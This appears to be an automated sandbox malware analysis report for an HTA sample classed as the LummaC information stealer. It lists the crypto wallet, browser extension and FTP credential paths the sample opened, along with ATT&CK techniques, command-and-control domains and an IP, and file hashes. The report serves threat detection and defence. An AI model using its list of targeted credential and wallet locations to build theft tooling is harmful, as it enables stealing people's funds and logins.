              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1196, type: MEMORYSTR
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              2
              OS Credential Dumping
              11
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts111
              Process Injection
              3
              Obfuscated Files or Information
              LSASS Memory22
              System Information Discovery
              Remote Desktop Protocol41
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell
              Logon Script (Windows)Logon Script (Windows)2
              Software Packing
              Security Account Manager231
              Security Software Discovery
              SMB/Windows Admin Shares1
              Screen Capture
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Process Discovery
              Distributed Component Object Model1
              Email Collection
              114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets221
              Virtualization/Sandbox Evasion
              SSH3
              Clipboard Data
              Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
              Process Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583047 Sample: web44.mp4.hta Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 26 noisercluch.click 2->26 28 cc.klipjaqemiu.shop 2->28 34 Suricata IDS alerts for network traffic 2->34 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 10 other signatures 2->40 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 50 Suspicious powershell command line found 9->50 12 powershell.exe 18 9->12         started        process6 signatures7 52 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->52 54 Suspicious powershell command line found 12->54 56 Found many strings related to Crypto-Wallets (likely being stolen) 12->56 58 3 other signatures 12->58 15 powershell.exe 15 26 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 30 noisercluch.click 188.114.96.3, 443, 49733, 49849 CLOUDFLARENETUS European Union 15->30 32 Injects a PE file into a foreign processes 15->32 21 powershell.exe 15->21         started        24 conhost.exe 15->24         started        signatures10 process11 signatures12 42 Query firmware table information (likely to detect VMs) 21->42 44 Found many strings related to Crypto-Wallets (likely being stolen) 21->44 46 Tries to harvest and steal ftp login credentials 21->46 48 2 other signatures 21->48

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              web44.mp4.hta0%ReversingLabs
              web44.mp4.hta2%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://noisercluch.click/api=100%Avira URL Cloudmalware
              https://noisercluch.click/100%Avira URL Cloudmalware
              https://noisercluch.click/api8)100%Avira URL Cloudmalware
              https://noisercluch.click/api100%Avira URL Cloudmalware
              noisercluch.click100%Avira URL Cloudmalware
              https://go.mic0%Avira URL Cloudsafe
              https://cc.klipjaqemiu.shop/web.png0%Avira URL Cloudsafe
              https://cc.klipjaqemiu.shop0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              cc.klipjaqemiu.shop
              188.114.96.3
              truetrue
                unknown
                noisercluch.click
                188.114.96.3
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    high
                    https://noisercluch.click/apitrue
                    • Avira URL Cloud: malware
                    unknown
                    rebuildeso.buzzfalse
                      high
                      noisercluch.clicktrue
                      • Avira URL Cloud: malware
                      unknown
                      appliacnesot.buzzfalse
                        high
                        screwamusresz.buzzfalse
                          high
                          cashfuzysao.buzzfalse
                            high
                            inherineau.buzzfalse
                              high
                              prisonyfork.buzzfalse
                                high
                                hummskitnj.buzzfalse
                                  high
                                  https://cc.klipjaqemiu.shop/web.pngtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://noisercluch.click/api=powershell.exe, 00000009.00000002.2888448728.0000000003675000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1704375410.00000000055D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://go.micpowershell.exe, 00000002.00000002.1698936708.00000000004E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://cc.klipjaqemiu.shoppowershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://noisercluch.click/powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2888738105.0000000003688000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2889805623.0000000005931000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://noisercluch.click/api8)powershell.exe, 00000009.00000002.2885773089.00000000035DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://contoso.com/Licensepowershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2424630687.0000000004967000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://en.wmshta.exe, 00000000.00000003.1725019421.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1725177020.0000000006692000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1722082534.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1725151894.000000000668F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1721997888.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1728590265.0000000006693000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1724065877.000000000668A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1722157514.000000000668A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1700290023.0000000004571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1704375410.00000000055D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000005878000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1700290023.0000000004571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2424630687.0000000004811000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        188.114.96.3
                                                        cc.klipjaqemiu.shopEuropean Union
                                                        13335CLOUDFLARENETUStrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1583047
                                                        Start date and time:2025-01-01 17:09:07 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 23s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:11
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:web44.mp4.hta
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winHTA@9/6@2/1
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 94%
                                                        • Number of executed functions: 178
                                                        • Number of non-executed functions: 56
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .hta
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 13.107.246.45
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target mshta.exe, PID 6616 because there are no executed function
                                                        • Execution Graph export aborted for target powershell.exe, PID 7164 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        TimeTypeDescription
                                                        11:10:00API Interceptor55x Sleep call for process: powershell.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        188.114.96.3QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/u7ghXEYp/download
                                                        CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                        • www.mffnow.info/1a34/
                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                        • www.mydreamdeal.click/1ag2/
                                                        SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.questmatch.pro/ipd6/
                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/I7fmQg9d/download
                                                        need quotations.exeGet hashmaliciousFormBookBrowse
                                                        • www.rtpwslot888gol.sbs/jmkz/
                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/Bh1Kj4RD/download
                                                        http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                        • kklk16.bsyo45ksda.top/favicon.ico
                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                        • filetransfer.io/data-package/XrlEIxYp/download
                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                        • filetransfer.io/data-package/XrlEIxYp/download
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        noisercluch.clickweb44.mp4.htaGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUStest.doc.bin.docGet hashmaliciousUnknownBrowse
                                                        • 104.21.21.16
                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.97.3
                                                        qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                        • 172.67.219.133
                                                        Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                        • 172.67.157.254
                                                        yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.92.91
                                                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 172.67.198.102
                                                        eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 104.21.38.84
                                                        GqjiKlwarV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 172.67.220.198
                                                        1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 104.21.38.84
                                                        YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 104.21.38.84
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0etest.doc.bin.docGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 188.114.96.3
                                                        YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 188.114.96.3
                                                        1.ps1Get hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                                        • 188.114.96.3
                                                        Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 188.114.96.3
                                                        OPRfEWLTto.jsGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCKGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        over.ps1Get hashmaliciousVidarBrowse
                                                        • 188.114.96.3
                                                        a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 188.114.96.3
                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        No context
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8979
                                                        Entropy (8bit):4.866537018464794
                                                        Encrypted:false
                                                        SSDEEP:192:Zxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smtjBrdcU6CDR:H1VoGIpN6KQkj2qkjh4iUxCdMUib4
                                                        MD5:C5F74029744D2B4244E38C45B36E9035
                                                        SHA1:804BE0E38E7D982BD937AE2B4F71EC0B23BF959A
                                                        SHA-256:6B3BDDE6B61F7FB780B78D20B1C205C6B15C0E515DBBD9A4EDD5C9A79F2AD258
                                                        SHA-512:8209B2FF16422EDB16E995D0CF2E07947FBBDD26F13BF654D655C9E4858F266B8D7CE766D47B5955AEEECC0883AD7FDADAB6C3493B54F9EFF008EE541D0F543D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1300
                                                        Entropy (8bit):5.395716438237918
                                                        Encrypted:false
                                                        SSDEEP:24:3tWSKco4KmM6GjKbmOIKo+mZ9tYs4RPQoUEJ0gt/NK3R8QHrg+:9WSU4Yymp+mZ9tz4RIoUl8NWR8QHt
                                                        MD5:13243E8F879F6C8A929F9BA8987649AC
                                                        SHA1:801C7EC5D76AE82B3877A6CA1BB0221F6EE5F707
                                                        SHA-256:1D00D2B2A2F71DFBFA9D68477B4F8E05592FD82D2ADCE85BDB3ADE09093AECC3
                                                        SHA-512:C02EBE3138772846ECAD5F25C554E8DB905A856104AA0ECFC8EB7C54DDDFA05AAE991BED90DBE04DD72EB4469C16BA6E8EF29D1AFCE3CCB7E3F1CEC91384A076
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
